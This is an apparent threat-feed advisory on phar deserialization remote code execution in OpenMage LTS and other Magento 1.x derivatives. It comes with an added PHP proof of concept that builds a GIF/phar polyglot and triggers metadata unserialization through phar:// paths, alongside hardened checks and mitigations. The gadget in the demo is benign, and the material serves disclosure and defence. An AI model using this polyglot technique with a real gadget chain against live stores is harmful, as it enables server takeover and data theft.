{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/phar-deserialization/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["phar deserialization","remote code execution","OpenMage LTS","Magento 1.x"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOpenMage LTS versions prior to 20.16.1 are vulnerable to remote code execution through phar deserialization. PHP\u0026rsquo;s \u003ccode\u003ephar://\u003c/code\u003e stream wrapper unserializes the metadata stored in a phar archive when the archive is opened, and OpenMage passes attacker-influenced file paths to functions such as \u003ccode\u003egetimagesize()\u003c/code\u003e, \u003ccode\u003efile_exists()\u003c/code\u003e, and \u003ccode\u003eis_readable()\u003c/code\u003e during image validation and media handling. An attacker who can upload a polyglot file (a valid image that is also a valid phar archive) and then get one of those functions called with a path that begins with \u003ccode\u003ephar://\u003c/code\u003e and points at the uploaded file has the archive\u0026rsquo;s metadata unserialized with classes and property values of the attacker\u0026rsquo;s choosing. 
This issue affects any versions derived from Magento 1.x with the vulnerable code paths in \u003ccode\u003eapp/code/core/Mage/Core/Model/File/Validator/Image.php\u003c/code\u003e, \u003ccode\u003eapp/code/core/Mage/Cms/Model/Wysiwyg/Images/Storage.php\u003c/code\u003e, and \u003ccode\u003elib/Varien/Image.php\u003c/code\u003e.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a polyglot file that is both a valid image (e.g., JPEG or GIF) and a valid phar archive. The image bytes form the phar stub, which only has to contain \u003ccode\u003e__HALT_COMPILER();\u003c/code\u003e ahead of the archive manifest, so the file passes as an image to anything that reads it as one.\u003c/li\u003e\n\u003cli\u003eThe manifest\u0026rsquo;s metadata field holds a serialized object graph (a gadget chain) built from classes the application can autoload, chosen so that their magic methods such as \u003ccode\u003e__wakeup()\u003c/code\u003e or \u003ccode\u003e__destruct()\u003c/code\u003e perform the attacker\u0026rsquo;s actions once the objects exist.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads the polyglot file to the OpenMage LTS server through a vulnerable endpoint, such as product images, CMS media, or file import functionality.\u003c/li\u003e\n\u003cli\u003eThe application stores the uploaded file at a location the attacker can determine, typically a web-accessible media directory with a predictable path.\u003c/li\u003e\n\u003cli\u003eThe attacker triggers the vulnerable application logic in \u003ccode\u003eapp/code/core/Mage/Core/Model/File/Validator/Image.php\u003c/code\u003e (line 72), \u003ccode\u003eapp/code/core/Mage/Cms/Model/Wysiwyg/Images/Storage.php\u003c/code\u003e (line 137) or \u003ccode\u003elib/Varien/Image.php\u003c/code\u003e (line 71) with a path that begins with \u003ccode\u003ephar://\u003c/code\u003e and points at the uploaded file, so that \u003ccode\u003egetimagesize()\u003c/code\u003e or a similar function opens it through the phar stream wrapper instead of as a plain file.\u003c/li\u003e\n\u003cli\u003eOpening the file through \u003ccode\u003ephar://\u003c/code\u003e makes PHP parse the phar manifest and unserialize its metadata. No call to \u003ccode\u003ePhar::getMetadata()\u003c/code\u003e is needed, and the wrapper does not care that the file carries an image extension.\u003c/li\u003e\n\u003cli\u003eUnserialization instantiates the attacker\u0026rsquo;s objects and invokes their magic methods, which the gadget chain turns into execution of the attacker\u0026rsquo;s code.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves remote code execution on the server, allowing them to 
compromise the system, install malware, or exfiltrate data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows an attacker to execute arbitrary code on the OpenMage LTS server. This can lead to complete system compromise, data theft, defacement of the website, or the installation of malware. Where the upload endpoint is reachable without authentication the impact is significant, with potential widespread compromise across all versions of OpenMage LTS prior to 20.16.1. The vulnerability exists in core Magento 1.x code, so all derived products are affected. Note that the automatic unserialization of phar metadata on open that this chain relies on is PHP 7.x behaviour; PHP 8.0 removed it, so installations running PHP 8 are not exposed to this particular trigger, although the missing path validation should still be fixed.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade OpenMage LTS to version 20.16.1 or later to patch the vulnerability.\u003c/li\u003e\n\u003cli\u003eImplement the recommended code fix by rejecting \u003ccode\u003ephar://\u003c/code\u003e paths before they reach functions like \u003ccode\u003egetimagesize()\u003c/code\u003e in the affected files: \u003ccode\u003eapp/code/core/Mage/Core/Model/File/Validator/Image.php\u003c/code\u003e, \u003ccode\u003eapp/code/core/Mage/Cms/Model/Wysiwyg/Images/Storage.php\u003c/code\u003e, and \u003ccode\u003elib/Varien/Image.php\u003c/code\u003e. PHP resolves wrapper scheme names case-insensitively, so the check must be case-insensitive (\u003ccode\u003ePHAR://\u003c/code\u003e works just as well as \u003ccode\u003ephar://\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect attempts to access files using the \u003ccode\u003ephar://\u003c/code\u003e stream wrapper (see rule \u0026ldquo;Detect Phar Stream Wrapper Access\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eIf upgrading is not immediately possible, unregister the \u003ccode\u003ephar://\u003c/code\u003e stream wrapper at runtime with \u003ccode\u003estream_wrapper_unregister('phar')\u003c/code\u003e early in the application bootstrap (for example from an \u003ccode\u003eauto_prepend_file\u003c/code\u003e), or build PHP with \u003ccode\u003e--disable-phar\u003c/code\u003e. There is no \u003ccode\u003ephp.ini\u003c/code\u003e directive that turns the wrapper off; \u003ccode\u003ephar.readonly\u003c/code\u003e only blocks writes and does not prevent reading, so it does not stop this attack.\u003c/li\u003e\n\u003cli\u003eImplement strict upload validation beyond file extension checks (for example, re-encoding uploaded images server-side so the stored file is regenerated and carries no phar manifest) to prevent the upload of polyglot 
files.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-21T14:32:48Z","date_published":"2026-04-21T14:32:48Z","id":"/briefs/2024-01-openmage-phar-deserialization/","summary":"A remote code execution vulnerability exists in OpenMage LTS versions prior to 20.16.1 due to Phar deserialization, where an attacker can upload a malicious phar file disguised as an image and trigger deserialization via functions like `getimagesize()`, `file_exists()`, or `is_readable()` when processing `phar://` stream wrapper paths, leading to arbitrary code execution.","title":"OpenMage LTS Phar Deserialization RCE","url":"https://feed.craftedsignal.io/briefs/2024-01-openmage-phar-deserialization/"}],"language":"en","title":"CraftedSignal Threat Feed — Phar Deserialization","version":"https://jsonfeed.org/version/1.1"}
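The attack chain and the recommended fix from the brief above, worked through end to end as an added example; this is not OpenMage code and not its actual patch. It assumes PHP 7.x on the command line with `phar.readonly=0` so that the polyglot can be written. `DemoGadget` is a stand-in for a real gadget class and only records that it was unserialized; `validateImageVulnerable()` and `validateImageHardened()` are hypothetical stand-ins for the validators in the three files the brief names; the GIF/phar file written to the system temp directory is constructed sample data. On PHP 8.0 or later the script still builds and opens the polyglot, but the gadget is never unserialized because PHP 8 stopped unserializing phar metadata on open.

```php
<?php
// Added example, not OpenMage code. Requires PHP 7.x (PHP 8.0 removed the
// automatic unserialization of phar metadata on open) and must be run as:
//   php -d phar.readonly=0 phar_polyglot_demo.php
declare(strict_types=1);

if (ini_get('phar.readonly')) {
    fwrite(STDERR, "run with: php -d phar.readonly=0 " . basename(__FILE__) . "\n");
    exit(1);
}

// Hypothetical gadget class. A real attacker picks an autoloadable application
// class whose magic methods do something useful to them; this one only records
// that PHP instantiated it from the phar metadata.
class DemoGadget
{
    public static $triggered = false;
    public $note = '';

    public function __wakeup()
    {
        self::$triggered = true;
    }
}

// Constructed sample: 13-byte GIF header (signature, 1x1 logical screen, no colour table).
const GIF_HEADER = "GIF89a\x01\x00\x01\x00\x80\x00\x00";

/** Build a GIF/phar polyglot whose archive metadata is a serialized DemoGadget. */
function buildPolyglot(string $dir): string
{
    $pharPath = $dir . '/polyglot.phar';   // Phar insists on .phar while creating
    $gifPath  = $dir . '/polyglot.gif';    // the name the "upload" ends up with
    @unlink($pharPath);
    @unlink($gifPath);

    $phar = new Phar($pharPath);
    $phar->startBuffering();
    // The stub is the first thing in the file: image bytes first so the file is
    // a GIF, then the __HALT_COMPILER(); token phar requires before its manifest.
    $phar->setStub(GIF_HEADER . '<?php __HALT_COMPILER(); ?>');
    $phar->addFromString('inner.gif', GIF_HEADER);   // gives getimagesize() something to measure
    $gadget = new DemoGadget();
    $gadget->note = 'unserialized from phar metadata';
    $phar->setMetadata($gadget);                     // serialize()d into the manifest
    $phar->stopBuffering();
    unset($phar);

    rename($pharPath, $gifPath);                     // the wrapper ignores the extension
    return $gifPath;
}

/** Shape of the vulnerable validators: the path goes straight to filesystem functions
 *  (file_exists(), is_readable() and getimagesize() all resolve stream wrappers). */
function validateImageVulnerable(string $path): bool
{
    return file_exists($path) && getimagesize($path) !== false;
}

/** Hardened shape (hypothetical, not OpenMage's patch): refuse wrapper paths first. */
function validateImageHardened(string $path): bool
{
    // Wrapper lookup in PHP is case-insensitive ("PHAR://" works too), so match
    // case-insensitively; rejecting every scheme also shuts out php://, data:// etc.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path) === 1) {
        return false;
    }
    return validateImageVulnerable($path);
}

/** Run the scenarios; returns [scenario => result]. */
function runDemo(): array
{
    $dir = sys_get_temp_dir() . '/phar-polyglot-demo';
    if (!is_dir($dir)) {
        mkdir($dir);
    }
    $upload = buildPolyglot($dir);
    $info   = getimagesize($upload);                 // plain path: reads as a 1x1 GIF
    $evil   = 'phar://' . $upload . '/inner.gif';    // the attacker-supplied path

    $results = ['plain_path_is_image' => $info !== false && $info['mime'] === 'image/gif'];

    DemoGadget::$triggered = false;
    $results['vulnerable_accepts']         = validateImageVulnerable($evil);
    $results['vulnerable_triggers_gadget'] = DemoGadget::$triggered;   // true on PHP 7.x

    DemoGadget::$triggered = false;
    $results['hardened_accepts']           = validateImageHardened($evil);
    $results['hardened_triggers_gadget']   = DemoGadget::$triggered;

    // Runtime mitigation while unpatched: drop the wrapper at bootstrap
    // (an auto_prepend_file is one place to do this). The suppressed warning is
    // PHP complaining that the "phar" wrapper no longer exists.
    stream_wrapper_unregister('phar');
    DemoGadget::$triggered = false;
    $results['unregistered_accepts']         = @validateImageVulnerable($evil);
    $results['unregistered_triggers_gadget'] = DemoGadget::$triggered;

    return $results;
}

foreach (runDemo() as $name => $value) {
    printf("%-32s %s\n", $name, $value ? 'yes' : 'no');
}
```

On PHP 7.x the vulnerable validator both accepts the file (the inner GIF measures as 1x1) and fires `DemoGadget::__wakeup()` before any result is even returned, which is the point: the damage is done by the `file_exists()` call, whatever the validator later decides. The hardened validator and the unregistered-wrapper run never open the archive, so the gadget stays dormant in both.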